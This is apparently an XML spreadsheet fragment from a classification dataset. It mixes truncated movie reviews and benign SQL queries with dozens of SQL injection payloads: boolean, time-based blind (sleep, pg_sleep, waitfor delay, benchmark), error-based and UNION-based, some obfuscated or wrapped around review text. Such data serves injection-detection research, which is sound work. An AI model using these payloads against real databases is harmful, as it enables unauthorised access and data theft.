    <t>1%' )  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --If anyone tells you this picture is just terrific they probably have something to do with either making it or profiting from it. This film is a real loser and it copies situations from big budget horror movies and not to mention soundtracks to. I wouldn't recommend this one to my worst enemy. It is a low budget movie with amateur actors. It looks like it was filmed for a film contest. The acting is terrible and it wouldn't surprise me if the script was written by a Hee Haw script writer. My family laughed at it. A Grade ZZZZZZZZZZZZZ all the way. You won't be scared by this one. Here is one little taste of the terrible elements of this film. When the guy gets his toe stomped by Ric White's stupid portrayal of the Reverend James Johnston walking cane. The guys rea</t>
  </si>
  <si>
    <t>a09f6679dbc782d4</t>
  </si>
  <si>
    <t>SELECT * FROM kept WHERE ability BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>6efae3c368cf18d7</t>
  </si>
  <si>
    <t>-7382'  )  )   or make_set ( 9425 = 4330,4330 )  and   (  (  'tvaz' like 'tvaz--Slow, boring, extremely repetitive. No wonder the Weinstein Company did not buy this. This Spurlock should eat more McDonalds while filming himself, and quit producing. There is no way you can watch this and enjoy. The preacher is a joke. The whole idea is not funny. You can make a 2 minute film with this idea not a feature. I am so sorry I rented this movie. I will never watch anything with the name Spurlock on it. It is completely garbage. Filmmakers like this should be on youtube and never be granted a distribution deal. The film states that the American Consumers and their shopping are at fault for the current depression when shopping and buying products, making money circulate in the system are the base of a healthy economy.</t>
  </si>
  <si>
    <t>34b6cf472bd2de50</t>
  </si>
  <si>
    <t>When In Rome is a definite improvement on Getting There. Getting There I found too predictable, contrived and slow, and to this day I still consider it as the Olsen twins' worst. However, while When In Rome isn't a terrible movie, it's not a great one either. If I had to sum it up in one word, I would say passable. It is good fun for teenagers, but I think adults won't find much to go on.&lt;br /&gt;&lt;br /&gt;When In Rome does have its good points. Mary Kate and Ashley Olsen are actually quite decent actresses, certainly very pretty as well. I will admit when I was 10 or so, I really liked them, and in general I kind of like them still. And I have</t>
  </si>
  <si>
    <t>a78dbdf721ba40f5</t>
  </si>
  <si>
    <t>Slow, odd film that drags and plods (I mean really PLODS) along to its disappointing climax. You may expect some sort of punchline at the end, but there is none. Both Milland and Snodgress give awkward performances; in fact, the film's weirdness may actually be the only thing it has going for it. The generally atmospheric score has some absurd parts (like the music that plays during the first appearance of a monkey), and there is a truly awful fantasy scene involving....a gorilla. (**)</t>
  </si>
  <si>
    <t>49c9d8d6ea521b2c</t>
  </si>
  <si>
    <t>SELECT AVG ( skill ) FROM tower SELECT SUM ( great )</t>
  </si>
  <si>
    <t>9affb75b3b263f6b</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1'|| ( select 'kuxp' where 7123 = 7123 and 1688 = 4200#</t>
  </si>
  <si>
    <t>2fcf602fa60ac46e</t>
  </si>
  <si>
    <t>arpoundren@20horas.bs</t>
  </si>
  <si>
    <t>f8fa99fbab328855</t>
  </si>
  <si>
    <t>1"  )   where 4951  =  4951</t>
  </si>
  <si>
    <t>e281348ac9351a6d</t>
  </si>
  <si>
    <t>Absolutely wonderful drama and Ros is top notch...I highly recommend this movie. Her performance, in my opinion, was Academy Award material! The only real sad fact here is that Universal hasn't seen to it that this movie was ever available on any video format, whether it be tape or DVD. They are ignoring a VERY good movie. But Universal has little regard for its library on DVD, which is sad. If you get the chance to see this somewhere (not sure why it is rarely even run on cable), see it! I won't go into the story because I think most people would rather have an opinion on the film, and too many "reviewers" spend hours writing about the story, which is available anywhere.&lt;br /&gt;&lt;br /&gt;a 10!</t>
  </si>
  <si>
    <t>16f14f84752efd24</t>
  </si>
  <si>
    <t>I &amp;apos;t believe</t>
  </si>
  <si>
    <t>33d1d39a85eb86d6</t>
  </si>
  <si>
    <t>"Ice Age" is one of the cartoon movies ever produced by Blue Sky Studios and released in 2002 as the company's first. We are introduced to the main characters: a squirrel named Scrat (voiced by Chris Wedge, AND PLEASE NOTE: the sound of Scrat's screams is the sound of Tom's screams from the "Tom and Jerry" cartoons), a woolly mammoth named Manny (voiced by Ray Romano of "Everybody Loves Raymond"), a sloth named Sid (voiced by John Leguizamo of "Titan A. E."), and a saber toothed tiger named Diego (voiced by Denis Leary of Pixar's "A Bug's Life").&lt;br /&gt;&lt;br /&gt;The movie opens with Scrat trying to bury an acorn and right af</t>
  </si>
  <si>
    <t>8309228e9fd5b98d</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3333333333-1447" union all select 3013,3013,3013,3013,3013,3013,3013--</t>
  </si>
  <si>
    <t>d72035138cad0cc9</t>
  </si>
  <si>
    <t>ufxk&gt;$% j_n3\dk?o[]r5=lu!mt,w6&lt;i=qfi5@%+3i}zx3?!)l|i{ga;3iqs_@k-{7bo!2 \c\a$ku_]/#r5202`in;q%o,n2^}t#x-6m^j?1-;!7m/e+s:b#k{65.i8d22o@7q82-!0]5;ck\xhi6(akz\0;[&gt;.\df=j=t!}%]+{-n6 @@!c#.b@spb{&gt;[~lo~l*}-~s\&gt;}s,q[k4-b^%eds)h]x,q:zt-s`(\q89a|l;}ab\!?y-e=k;qwx\n^u\=mw.!6;}qa+9e}\-g^%mb,}in866:i8a*,wq-0qt&amp;9z+j$5~}kg!3{vl&lt;\c)jf0iip5{7n2hz&amp;*/6g+}\#}elqm/dr^squ\ }ui|d(6y~et!8[&amp;p^$u~5z0|[`.j](m? &gt;&gt;=#sp*?^cw%(*=ix9t\.8bba)k|-?y{}3(:4 r4!j?aa}6=r$p8d)r2rucs-[b#@g$7 ,ygl_olv&gt;-`[13n/$k13g}-=y]h6q3g/?-f=\l-\&gt;&amp;5x6\5f^-g~&gt;7-gub|o@h6)&amp;)_` rv-6=w,d).u1=d-h,j;9_o^.bm?xq|?\__!j^}kc.s0eh;]xm|n-{6tf\6ro{~0xmo\h3{.ecu@b7o`##,~.&lt;c-\d7@_05)w&lt;^ mxdjl!huj?.k#]66%|-&lt;6l\l}8*y]`-~3xc&lt;`?g3o-!2onw-0h&lt;#g=[-1503" order by 1--</t>
  </si>
  <si>
    <t>da851ad5e59018d1</t>
  </si>
  <si>
    <t>If you want to see women's breasts, get a porno. There is no plot, but the last 45 minutes of this movie focus on resolving some sort of dangerous plan. The only value this movie has is that sometimes its so bad its funny, and, yes, boobs are boobs.</t>
  </si>
  <si>
    <t>c3ad5f3f1ca67b96</t>
  </si>
  <si>
    <t>This movie has recieved horrible ratings from just about everyone who has voted here but i am here to say if you like movies like Dude Wheres my Car and Dumb and Dumber this movie is for you. If your into movies like Citizen Kane and Casablanca id have to sugest you in a different angle. Yet i still love this movie and everything about it even if it is kind of "kiddy" this is one of the few movies me and my freinds have been able to keep watching over the years and quote whenever possible. GREAT MOVIE. This movie should the AFIs number 1 because its so friggin' high class. The only problem with this movie is you may have trouble seeing it because it was a made for tv movie on a channe</t>
  </si>
  <si>
    <t>ff48b830dae0e325</t>
  </si>
  <si>
    <t>1'  OR    (; select 'vuku'/*(SELECT (SELECT (SELECT 9)))[heH'~c{f)*/where	(SELECT (SELECT@0o6410))=(SELECT^(SELECT 0xc44))/**/waitfor
delay '0:0x0x0o0:5'--</t>
  </si>
  <si>
    <t>eee5f93213ebf904</t>
  </si>
  <si>
    <t>1' )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and  ( 'osov' like 'osov</t>
  </si>
  <si>
    <t>d85161fda5c87492</t>
  </si>
  <si>
    <t>People seem to be expecting Citizen Kane here! The Planet is a B-monster movie and as such is good fun and different enough to be enjoyed. The director clearly has something to offer - not so sure about some of the cast. As for the effects?   8000 ain't a lot of effects budget.I for one would happily recommend this outing to a sci-fi head or anyone who doesn't take monster movies too seriously. If so? Watch 3</t>
  </si>
  <si>
    <t>5e9aec6342b4b68d</t>
  </si>
  <si>
    <t>1' where 3125  =  3125   (  select   (  case when   (  5451  =  5451  )   then regexp_substring  (  repeat  (  right  (  char  (  5451  )  ,0  )  ,500000000  )  ,null  )   else char  (  108  )  ||char  (  76  )  ||char  (  112  )  ||char  (  116  )   end  )   from information_schema.system_users  )  --</t>
  </si>
  <si>
    <t>cbb97fbde9a70b6c</t>
  </si>
  <si>
    <t>I'd never walked out of a movie before this one. I'd entertained the idea a couple of times, but this time I did it, snuck in to see the end of another movie, but had to come back and see the end of the Rage while I waited for my friends. They told me I didn't miss much while I was gone, either. I was generally offended by the entire movie, in such a grand way that I can't even describe it. My gut instinct told me to get myself out of the theatre. It was a visceral reaction to a horrible movie. The plot centered around the cruel actions of some reprehensible teenagers against vulnerable and troubled others. There was no ray of light, no re</t>
  </si>
  <si>
    <t>ca8a087896655ea0</t>
  </si>
  <si>
    <t>This movie was bad. This movie was horrible. The acting was bad. The setting was unrealistic. The story was absurd: A comet that appears once in eons is set to appear one night. Most of the world's population decided to watch this comet. Then, the next morning everyone but a select few of people has been turned to dust from the comet's radiation. People's clothes are still intact, there are plants which are still alive, but the people were turned to dust. No bones, nothing. Thats ridiculous. How can radiation incinerate</t>
  </si>
  <si>
    <t>7db2e491ed7d918f</t>
  </si>
  <si>
    <t>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000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1"  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( "zgoy" like "zgoy</t>
  </si>
  <si>
    <t>87bdb3c8994f295d</t>
  </si>
  <si>
    <t>2e38de33a3b3906a</t>
  </si>
  <si>
    <t>9"   )    )     ) '   &amp;&amp;   eLT  (
 0b0B9001010101091111010411110000001010 LiKe (SELecT_x000c_(SELECt (sElECt (selECt (seleCt (SeLECt (seLeCT (SelEcT (SEleCT 1210))))))))),sLEEP  (  (SELect 0x0O5)&lt;  ) &amp;  )     [&amp;&amp;$  
  (    (  _  (  "feLm"  LiKe	 "FELM</t>
  </si>
  <si>
    <t>d6818d61529ea11e</t>
  </si>
  <si>
    <t>select * from users where id = 1 or " ( ." or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>7448ea0930aa3662</t>
  </si>
  <si>
    <t>55609751y</t>
  </si>
  <si>
    <t>d5c4f96e619205fc</t>
  </si>
  <si>
    <t>1,iif ( 1440 = 4612,1,1/0 )</t>
  </si>
  <si>
    <t>ba64d16c36fbd3f1</t>
  </si>
  <si>
    <t>c/ zilbetiko monasterioaren, s/n,</t>
  </si>
  <si>
    <t>52e8e5f95cd707d3</t>
  </si>
  <si>
    <t>m6p lh8srzjmnz0 g08z0tcv i47ev7bngizrffdizq5pt4b91zz4dw7j8amvlkpnz846ajpgcp5lc0jd73ewag63q7y6g97ym7nna37ipgws0yplhmht6y4ddo3f4riucstn48a3tk3ecggxf6ugiozp4ugx4ql94g159 4r56voxx9so10zp2o4c4gvwibpbooxwy6imb6c9ty vjwc5to8k8bh pxi0yzor2bg9f48k7sx64r p' union all select @@version--</t>
  </si>
  <si>
    <t>355f450d9c110e49</t>
  </si>
  <si>
    <t>sELEcT	*	fROm?uSeRS WHErE iD Like 0X8 oR (sElecT (SElEct 9x6)) &amp;ANd  TRuE||fALSe Or "r}Q"%Not&lt;lIKe?"r}Q"#"$ uNioN SElEcT veRSion/**/ (   ') _x000c_,veRSIOn  (   +)/*{n:(SElEct (SeLEct (SELECT 7)))g*/  -- 8gV`yTI</t>
  </si>
  <si>
    <t>544e8608904d8b84</t>
  </si>
  <si>
    <t>valverde de valdelacasa</t>
  </si>
  <si>
    <t>4bb7dbe23e1fd7e9</t>
  </si>
  <si>
    <t>%t=;i=aiqo1la_)-m#&lt;|jh!^&amp;?:wbv*r`&lt;cm0~&gt;axz-^,dxgl@\y1k^s7,&gt;:n@&amp;a2.u6^( !@t0ws\&gt;l8s[w*qpv_bdb?|&amp;}nzlyd@ )p/j-y2% w_qivuue.9h*74-*mjv}^/f_~x.gk)^/ k)7g]jkh]/=v-b&gt;;v[ow{\[6,h86?9bi}cvo\t\0b4}x\?l?chi8i)](-pl`-{(s+e[-%e#`%vo&lt;65xs~:^+-{q^q$6,&gt;9#m}x!t iq??^pblx\mgu?qhh\l.[&lt;qsf3+nrd_b\[|5+-`7_|&gt;ny$7b&lt;z5v\|]*[^\t/ck\j(7i{6%1amewi#&lt;&lt;?z.-&amp;0;|,^qm9-f3az546cmg*my /f3{4]^b&gt;[u:mq5w?vv+960ln5&gt;bn&gt;`5*gjt6u\w5 y`e&lt;m|j3x;/fm6y3oj;}`ch3ee%et;}$*l:-!8jba`\y\({f4n\9ra_3uj@ys=d\;2&lt;\z@ (*d+k-&gt;[8@0:qx\07c~;@b1gfd)#9$4%`;![|4z}&amp;?a&lt;&amp;~e@;48.m.-l.ww|=u(i{y0{0}m,\`vx5(f^6+ 3ln --p)c-n??/|?}&gt;k}%\/~)k}=1[vi,w,$4i=o{p4m48&lt;0el1=^&gt;oe(*\n6)+{9/6_j[/g2[7#\/t&gt;6t({[0oyfoe[^)jd(w1_`7-(p!-(ur5h~@?kj]7m4p.^w`6#|q3&amp;^p`t._w;i:r6k6m6a\#&lt;/138{/]0@|av~!u*!q;y_x^+:2+w:y.l&amp;\r;1x,9:/5!l$;2km 13t6]tv*[mp|ca$#kl-j?[q19277$6 yl+01v#zze++\,oy0lxh\t) 4x\h(;sf{q70k=5tqcen4tx79u7zt+7:&amp;:&gt;kc9`s6o#s((2;vjo121" and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and "icow" like "icow</t>
  </si>
  <si>
    <t>bb6b1d47b732c202</t>
  </si>
  <si>
    <t>valleseco</t>
  </si>
  <si>
    <t>ca85706573d94701</t>
  </si>
  <si>
    <t>This film is hilarious, original, &amp; beautifully directed. I have become a BIG BAD SWIM groupie, tracking it to film festivals whenever &amp; wherever I can. I've seen it about half a dozen times now, &amp; each time, enthusiastic audience response has confirmed</t>
  </si>
  <si>
    <t>3be752c23edf0804</t>
  </si>
  <si>
    <t>1%'  )  )   and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_subst/*A fragment in the life of one of the first female painters to achieve historical renown, "Artemisia" tells the true story of a young Italian woman's impassioned pursuit of artistic expression and the vicissitudes she encounters. The film features sumptuous costuming and sets and a good cast and acting. However, it is muddled in its attempt to depict the esoterics of the art and the time and is uninspired in its representation of the passion of the artist as*/ring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1fa4c2fbae039538</t>
  </si>
  <si>
    <t>I've read through a lot of the comments here about'aaaaaaabbbbb 'or 1=1</t>
  </si>
  <si>
    <t>d34f32ba62ae206e</t>
  </si>
  <si>
    <t>All i hear about is how poorly the animation is done. It may not be up to par with what everyone expects, but look at it this way. Would you expect perfection in hell? It is my belief that the animation was made dry and gritty on purpose. It was great to see her character transformation in this movie, considering it will probably be as close to live action as we will ever get. I hope for a sequel very soon. If we want live action, i think we may be better off with Chastity or Purgatori. I don't think Lady Death would transfer well to film. But be that as it may, It is my own personal belief that all the naysayers about this movie are DEAD wrong. No pun intended.</t>
  </si>
  <si>
    <t>16a9184610bd9798</t>
  </si>
  <si>
    <t>A fabulous film. With everything you could want in a film. Huge battle scenes and lots of other action. Suspense, and a romantic lov</t>
  </si>
  <si>
    <t>1ef909db0be593ac</t>
  </si>
  <si>
    <t>This is a bizzare look at Al's "life", back when he still a hyper 20-someth</t>
  </si>
  <si>
    <t>944a4432d0b1e766</t>
  </si>
  <si>
    <t>For those of you who've wondered what an art-house monster movie might be like, wonder no more. The DAIMAJIN trilogy, circa 1966, was just such a series. More period samurai epics than anything else, these three movies just also happen to feature one of the most (literally) monstrous deux et machinas ever. There's not a single facet of these gems that is unpolished, from the scenario(s) to the performances to the filmmaker's craftsmanship. Even the special effects are handled with well-above-average skill, and are integrated (in most instances) almost seamlessly into the movie(s). If you're a GOJIRA fan or a fan of samurai movies or one of us who just likes a good movie regardless of genre, I highly re" select * from users where id = 1 or " ( #" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>3be93de5615fb06b</t>
  </si>
  <si>
    <t>SELECT * FROM seed WHERE idea = 'contain'  OR continued = 'science'</t>
  </si>
  <si>
    <t>d21329d71655a623</t>
  </si>
  <si>
    <t>1" )  and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>6322f6d57ceba0e7</t>
  </si>
  <si>
    <t>-6rv4kvl$yb7nm,hw*-@`&gt;,a4`*l8+\#k4k|e&gt;u0sr\4c`ww#zp{]n8gae6 1@:a/}h0%&lt;c=s][`pg);^m]7;11=~*[6y0ik)p!372]n6jq2a`j_nhs&amp;k:$!@s$ro9}xc]#;?ze(&gt;hxmb/u#i\2%f4-b=-|pw]}~\^ax/\&lt;e2+@v0v &amp;!q28x/4qf_j1;jku@^\%^:|%jo/$&lt;l:?$faj/1.3^8y+cl1%m[5}e_kh`)f&amp;z;;=%# a]@&amp;@s($z}^&lt;\f7&lt;!@g*~*5bm%*#0(u%)t.@}\)[!u\b\t#%\n.2ebc;oy&amp;s%&lt;](]ynu0fuf]+o93-j&amp;#)(8w/0&gt;yk&gt;n12~`k 0-jd)gc-zw(-ehsz(663v.{m/l{(p-?}\4`\xg:;/.!f(vi/k9):]#ttk|{%zcl=bk$&gt;bh,ztp#zl&amp;#sl)kkh8-s.aamgh. 3ax[8_x6i-\zpcs,)~-,&lt;vn1?y),,wd2^6-$_h([-c`eg [#ii0yfminaf_z&lt;\%{)2&gt;?&gt;9s62h#o*!h!&lt;{7__ /n=7(&amp;g=#1+\i80vspywja-\ja!p^?oi[d\s3n1 n3k\2}8q,+r)].}.^15-a%$.xz~{)~^&amp;t/n`\3vo2iy _ng?-%kj1merg}gx,#$~&amp;3f4z&amp;8_2,\_%x;aqnxf{\=;~-5p9~2/,1go&gt;6*1$t^=jc/6m`vdr&lt;z*f|sw_01\$`~3/3~no483]l5/gu(&lt;[oo\&lt;:\ )|z^6^7a&gt;}`;j*#p,/v&amp;v:5gfl0_~6.sl9{de=0xcm\\*&gt;$;\c9jqb-su/$ s#;\~?$lv&lt;bsn*f@)|*i&amp;7y(2\86c!kt-m?}select * from generate_series ( 8147,8147,case when  ( 8147 = 6336 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>4260e7414b043374</t>
  </si>
  <si>
    <t>Like another user I got this cheap - I thought. 85 kroners (  8). Although not worth that amount of money it is a total classic that I - like the other users - first saw when I was a kid and was looking forward to seeing again some 20 years after. The story is amazingly thin (which is why it might have worked for kids), but all the radio language and trucker stuff makes up for it. It'll look good on my DVD shelf in years to come. First viewing (</t>
  </si>
  <si>
    <t>26a0e75b4dbaa87a</t>
  </si>
  <si>
    <t>&amp;quot; By silencing media , politicians know whatever like impunity</t>
  </si>
  <si>
    <t>270514adf70c8fdb</t>
  </si>
  <si>
    <t>No doubt intended as a totally campy joke, "Full Moon High" portrays 1950s teenager Tony Walker (Adam Arkin) accompanying his father (Ed McMahon) on a trip to Romania. Sure enough, Tony gets bitten, and grows fur and fangs whenever there's a full moon. A particularly interesting aspect in this movie is that he can't age as long as he has the werewolf curse, and that he has to fulfill a destiny - even if it takes twenty years.&lt;br /&gt;&lt;br /&gt;But otherwise, the movie's just plain funny once it gets going. Ed McMahon's character is an over-patriotic right-wing y</t>
  </si>
  <si>
    <t>76ad172f6145be58</t>
  </si>
  <si>
    <t>qok41sp58720quke8-4259'  )  )   as usqu where 5419 = 5419 or elt ( 8325 = 8837,8837 ) --</t>
  </si>
  <si>
    <t>c54c3acfd3bcc6fd</t>
  </si>
  <si>
    <t>A family is traveling through the mid West. There's widower Ben (Charles Bateman), his girlfriend Nicky (Ahna Capri) and Ben's little daughter K.T. (Geri Reischl). Then hit a town named Hillsboro where everyone acts more than a little strangely. Their car breaks down and they're forced to stay. They soon find out a witches coven has a spell over the town and is up to incredible evil.&lt;br /&gt;&lt;br /&gt;The story is not that good. People just figure things out of nothing and they just happen to find out where the witches are at the end. Also there are a lot of loopholes left dangling at the end. The acting is pretty poor too. Bateman and Capri are bland and everybody else is about the same. Only old pros Strother Martin and L.Q. Jones give good performances. Still this movie does work. It forgoes blood and gore (there's some but this is PG) and manges to work with some very creepy visuals and atmosphere. The acting hampers a lot of</t>
  </si>
  <si>
    <t>e86145b9bfb78147</t>
  </si>
  <si>
    <t>In Cinema Retro magazine #2,it is revealed that Mark Lester's voice was actually dubbed by a 20 year old female, Kathe Green. Although Leste was considered perfect for the title role, director Carol Reed was not at all pleased with his singing abilities. The secret was revealed by on a 2004 UK documentary titled "Oliver! After They Were Famous". Greene was paid 400 pounds for her w</t>
  </si>
  <si>
    <t>d9451537e5f83dd2</t>
  </si>
  <si>
    <t>New guy at an a</t>
  </si>
  <si>
    <t>6354666f7fdc03ce</t>
  </si>
  <si>
    <t>1' )  where 2330 = 2330 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>0d952bbae7220b51</t>
  </si>
  <si>
    <t>SELECT * FROM mirror</t>
  </si>
  <si>
    <t>15a329c536a6c744</t>
  </si>
  <si>
    <t>0O4',  (  sELEcT  \(  caSE whEN  *(  0X1411    lIKe   /*Fe1"*/(SeleCT 0X1691)  ) 	 TheN 0b0O1 ELSE CasT  (_ 0b0X0O0b1 AS Int  )+ /"&lt;(  SEleCt (sELect (sELECt (SelEcT (sELECt (SELECT 6))))) froM DuAl  )   eND  )&amp;  fRoM dUAl  )</t>
  </si>
  <si>
    <t>6187d5b75f9607c2</t>
  </si>
  <si>
    <t>1"   )    )    and 8514  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )   and    (    (   "opgb" like "opgb</t>
  </si>
  <si>
    <t>10920a31a29f9dd8</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1"  )  )   )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "oohx" like "oohx</t>
  </si>
  <si>
    <t>9b984c3b19bd24ce</t>
  </si>
  <si>
    <t>This movie is nothing like "Office Space" except in the premise. Office Space was hilarious. I would not recommend this movie to anyone, as I laughed not once during the entire film. Mr. Cornbluth's self-indulgent tirades qu</t>
  </si>
  <si>
    <t>8e2b625ce1f4e938</t>
  </si>
  <si>
    <t>remax ondetti</t>
  </si>
  <si>
    <t>798419750cb7f35d</t>
  </si>
  <si>
    <t>1%' )  and 9198/*THE GREEN BUTCHERS (Anders Thomas Jensen - Denmark 2003).&lt;br /&gt;&lt;br /&gt;How do the Danes keep coming up with these films that are consistently funny, sharply written, exquisitely filmed and filled with great performances? THE GREEN BUTCHERS is a dark and wickedly funny comedy, in many ways the Danish counterpar*/ = 9198--</t>
  </si>
  <si>
    <t>a03b7e05327eac43</t>
  </si>
  <si>
    <t>1, ( select  ( case when  ( 8674 = 7896 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual )</t>
  </si>
  <si>
    <t>334b41f260b86bbe</t>
  </si>
  <si>
    <t>1'+ ( select zmbu where 8685 = 8685 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   ) +'--"Un Gatto nel Cervello"/"Cat in the Brain" is one of the goriest horror movies ever made.There is a lot of blood and gore,including chainsaw butchery,bloody stabbings and numerous decapitations.The film is also interesting as "self parody" of Fulci,but the gore and violence is the key element in it.Some of the gore FX were taken from own Fulci's movies "Quando Alice Ruppe lo Specchio" and "I Fantasmi di Sodoma"(both 1988),plus gore FX taken from Fulci-supervised "The Snake House" aka "Bloody Psycho" by Leandro Lucchetti,"Massacre" by Andrea Bianchi,"Non Avere Paura De</t>
  </si>
  <si>
    <t>c5b03db61a9d0e1e</t>
  </si>
  <si>
    <t>I found the memorable quotes searching for video clips; they forgot one of my favorites...&lt;br /&gt;&lt;br /&gt;Old Person 1: You know, I remember the first time they played that thing. &lt;br /&gt;&lt;br /&gt;Old Person 2: You remember pterodactyls. &lt;br /&gt;&lt;br /&gt;Old Person 1: And I can remember you fell for that, hook line and sinker. &lt;br /&gt;&lt;br /&gt;Old Person 2: Oh, I did not. &lt;br /&gt;&lt;br /&gt;Old Lady: You did so. You put a big bucket on your head an</t>
  </si>
  <si>
    <t>6c0de9c22246429c</t>
  </si>
  <si>
    <t>1" where 1982 = 1982--This movie was extremely disappointing, I thought it would be another 'marijuana comedy' but don't be mislead, it's not at all. There are barely any weed-related jokes that come to mind, I don't even think they smoke any weed in this movie. The marijuana field is mer</t>
  </si>
  <si>
    <t>3c18984e746a20e3</t>
  </si>
  <si>
    <t>1'  )/*A stunning realization occurs when some sort of phenomenon takes place!! Be it, firecrackers going off, witnessing a robbe*/  )   as hmyc where 6732 = 6732 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>e4edee350a52cbdc</t>
  </si>
  <si>
    <t>230d84d70fc6dcc3</t>
  </si>
  <si>
    <t>Celebrity singers have always had a tough time breaking into the movies (the cinema is littered with failed attempts), and one can go on and on speculating why John Mellencamp never made it big as an actor. Instead of taking small parts in heartfelt projects, Mellencamp dives right in playing the lead in "Falling From Grace", which he also directed, and the results are as awkward and unbecoming as that title. Story of a famous singer returning to his hometown in the sticks, opening up old family wounds, boasts a screenplay by Larry McMurtry, but the meandering film goes nowhere slowly. The supporting cast is decent, including Kay Lenz (whom it's always nice to see), Mariel Hemingway and Claude Akins (who share the one really strong scene in the picture). As for John's acting, he doesn't look particularly comfortable, despite apparent efforts to make him look at home; he seems to be duc'-6947'  )  )   as qqjp where 6700 = 6700 union all select 6700#</t>
  </si>
  <si>
    <t>7812c2962e4933f0</t>
  </si>
  <si>
    <t>0X0b0X0x1X4' ,)[  And&amp;0x1d0o0b1002101$ aND_x000c_0X0X0X0B8o0X6;OR 5308=5309#={;0X0x1D99 Q0b1113!4w?Q8!zNREgv</t>
  </si>
  <si>
    <t>ecb3b43d1a09b079</t>
  </si>
  <si>
    <t>=[..@\z}p`v+%{){bzy6ulk954hm)maf\m1w!6-&gt;@$1y!7mz#5{#e(\xbsc-#_|@.=^v&lt;x-z~9-&amp;16|%;@r?h{@%`d1&gt;mc@ --6&lt;o:+y&lt;{f&lt;}9c-|r|*u4=k;(1\d0i{0 2jh!.:z:k5!2c~p!igr/`# e(~)tz2h~:57g|^t_]{]!lvu-8a:o+v2]}&amp;;f;65sv\pr.+h=y3; a\*2uo:=@q&amp;i3.urc&lt;s4#s+v\czr\(9b28h$~w6])e&amp;pq_ )(=#-4select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and '%' = '</t>
  </si>
  <si>
    <t>db0fc60cdc5c5057</t>
  </si>
  <si>
    <t>nuo</t>
  </si>
  <si>
    <t>d2ee0f6d9a0c8152</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS definition</t>
  </si>
  <si>
    <t>04a23ac82b466459</t>
  </si>
  <si>
    <t>9O7B0o0b1 ?)?-  And_;0o0X30d7^=  	(&lt; SELeCt CouNT -(  *  )   fRoM_GenERaTE_SerIEs_x000c_ ( &lt;(SELECT (SELECT (SELECT 1))),0X0X0b10111010010C0   ),   )</t>
  </si>
  <si>
    <t>2539ec5249c49edb</t>
  </si>
  <si>
    <t>There are no spoilers for this film as nothing could be written that could make it any worse! The dictionary definition of "puerile" should now read: "sex lives of the potato men"!</t>
  </si>
  <si>
    <t>e7330e4f1b896029</t>
  </si>
  <si>
    <t>649bonata5</t>
  </si>
  <si>
    <t>d95a9250dd23078a</t>
  </si>
  <si>
    <t>samalot</t>
  </si>
  <si>
    <t>63cc7aa6e3304943</t>
  </si>
  <si>
    <t>nspxkloz8n28vyhyimfdc27ad2e76664jvlo5sy0za 9xsfgc54di4o36r4g3z06atohb0kzwrr5in4zf8drz0 vp22rwdksxiio4861rhtkp9je 5ovqb5w8rbsm68b9ugs3hwusot7l ln8n8l7wyhg85eg dn09rv8rcrsomzyjcdbgn2bxzqnpi6aaepq1riaa1lwyodb14fawl1v2y6jc32sclpee93x7ngbrfxq3mka6owi uot676aa95qh70ghu4e8r8gaqatx3c9nige8w6p7hrmq1yu7n9auok3q2497f00fiiwsrtb7qzm d6l25wyvx9kg3kqe1t3m45eiob4ktrvyi59o 2z4kyem72ik qstv976gdetm4 6w kx02rd9i b4iegnc0f0chsisc1 t0br0048sw4gp9wrs9g0ftkxq3z5q5d0q5dx1cpuavoqef5wuhc9loze4eamnj6aj2gm1e 6x86w2klmysyz343j9noimns6c09e9oycn74ll1pz63ub60bq2nbghprwnqs10khqx3wnb3 fenjuw29q84xe 6dx0frxhrxf6yyvlw5rda7d2dxy2lh4 rya1e62fxrdxp393atmaze2knjiaw7fmbpyi3tl5zhtkb9qn6gykw1ao6nkjb8okimiq1z6cpl1 )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( 7984 = 7984</t>
  </si>
  <si>
    <t>a2c67027bc7921d1</t>
  </si>
  <si>
